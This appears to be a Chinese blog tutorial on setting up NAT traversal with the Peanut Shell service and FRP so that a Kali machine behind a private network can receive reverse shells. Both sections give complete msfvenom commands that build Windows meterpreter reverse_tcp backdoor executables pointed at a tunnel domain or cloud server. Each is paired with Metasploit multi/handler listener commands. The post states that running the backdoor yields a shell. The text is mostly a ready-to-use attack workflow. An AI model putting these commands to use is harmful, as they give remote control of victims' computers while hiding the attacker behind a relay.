首页 > 其他分享 >花生壳内网穿透&FRP

花生壳内网穿透&FRP

时间:2022-11-30 10:34:37浏览次数:35  
标签:multi handler kali 穿透 exploit FRP 花生壳 msf6

花生壳内网穿透

大致流程为:花生壳网站注册--->绑定本地内网主机--->配置映射外网的地址监听与本地主机映射的端口--->反弹shell

1.在花生壳上配置好地址

https://hsk.oray.com/

 

 

 

 

2.下载客户端,用的kali所以选择Linux下载,注意kali是基于Debian的。

https://hsk.oray.com/download

 

 

 3.本地kali运行该命令,并解压。

┌──(root㉿kali)-[/opt]

└─# wget "https://down.oray.com/hsk/linux/phddns_5.2.0_amd64.deb" -O phddns_5.2.0_amd64.deb

 

┌──(root㉿kali)-[/opt]

└─# dpkg -i phddns_5.2.0_amd64.deb  

 

4.绑定SN即上面生成的SN号。

方法一:登录花生壳绑定SN并激活。

方法二:访问http://b.oray.com 使用SN登录然后再绑定花生壳账号,我这里SN登录后绑定一直失败所以使用第一种。

其实都一样都需要花生壳和在kali生成的SN号绑定。

5.本地kali启动花生壳

┌──(root㉿kali)-[/opt]

└─# phddns start

6.生成msf后门文件

msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=361gu87858.yicp.fun LPORT=27126 -b "\x00" -f exe -o houmen1.exe

7.msf开启监听模式

msf6 > use exploit/multi/handler

msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp

msf6 exploit(multi/handler) > set lhost 192.168.88.89

msf6 exploit(multi/handler) > set lport 4444

msf6 exploit(multi/handler) > run

8.运行生成的该后门文件即可在本地kali收到反弹的shell

FRP内网穿透

前提需要一台云服务器,优点是方便,隐私。

1.下载frp。

https://github.com/fatedier/frp/releases

 

 

2.上传该包到云服务器以及本地kali。

3.在云服务器以及本地kali解压下载的文件。

tar -zxvf frp_0.45.0_linux_amd64.tar.gz

4、进入解压目录分别更改frpc.ini(客户端,即本地kali)以及frps.ini(服务端,即云服务器)。

vim frps.ini     #这是云服务器上的

 

#注意有的云服务器端口需要在购买云服务器控制台开通端口。

 

vim frpc.ini  #这是本地kali的

5、先启动云服务端: ./frps -c frps.ini

再启动客户端:# ./frpc -c frpc.ini

6、生成msf后门文件

msfvenom -p windows/meterpreter/reverse_tcp lhost=云服务器地址 lport=9999 -f exe -o frp.exe

7、msf启动监听

msf6 > use exploit/multi/handler

msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp

msf6 exploit(multi/handler) > set lhost 127.0.0.1

msf6 exploit(multi/handler) > set lport 4444   #注意要和客户端frpc.ini的local_port一致

8、运行后门文件即可反弹

 

 

标签:multi,handler,kali,穿透,exploit,FRP,花生壳,msf6
From: https://www.cnblogs.com/kanninabixing/p/16937535.html

相关文章

  • 射线检测 UGUI UI点击穿透问题
    1.首先检测是否点击到UIpublicstaticboolIsPointerOverUIObject()//检测是否点击到ui{if(EventSystem.current!=null){Point......
  • 缓存穿透问题的解决思路
    缓存穿透:缓存穿透是指客户端请求的数据在缓存中和数据库中都不存在,这样缓存永远不会生效,这些请求都会打到数据库。常见的解决方案有两种:缓存空对象优点:实现简单,维......
  • redis缓存击穿、缓存穿透、缓存雪崩
    redis缓存穿透、缓存击穿、缓存雪崩​ 在我们日常的开发中,无不都是使用数据库来进行数据的存储,由于一般的系统任务中通常不会存在高并发的情况,所以这样看起来并没有什么问......
  • 最新内网穿透frp搭建使用教程-保姆版
    FRP1.前提准备公网域名,公网服务器2.设置二级子域名并解析二级域名解析云服务器端口放行3.去下载frp开源工具https://github.com/fatedier/frp/releases......
  • 利用frps进行内网穿透
    这里使用的是传统穿透方法,需要一个有公网ip的中转节点去告知看最下面,用最新版的frps1、注意服务器和客户机之间的数据传输全部经过中转服务器,传输速度将受制于中转服务......
  • 异地远程连接在家里的群晖NAS【无公网IP,免费内网穿透】
    群晖NAS,少不了有在外网远程访问的需求。尽管群晖有自带的QuickConnect,但是使用起来不是很理想,而且,现在基本不会被分配到公网IP,个人被分配到的基本都是内网IP。而在没有公......
  • 简单三步快速实现内网穿透
    都知道现在基本处于大内网环境,运营商一般不会分配给到公网IP。但有些时候需要在公网环境下访问内网,如:远程连接内网电脑远程公司内网服务器、数据库远程NAS公网访问内......
  • redis 缓存设计之穿透击穿雪崩
    缓存穿透缓存穿透是指查询一个根本不存在的数据,缓存层和存储层都不会命中,通常处于容错的考虑,如果从存储层查不到数据则不写入缓冲层缓存穿透将导致不存在的数据每次请求......
  • 内网穿透
    目录花生壳花生壳1:选择域名2:配置映射3:访问检测......
  • frp 容器化部署
    frp服务端部署编写docker-compose.yml文件,这里设置成放开7000-7010的端口,可以根据需求自行修改version:"3"services:frps:container_name:frpsima......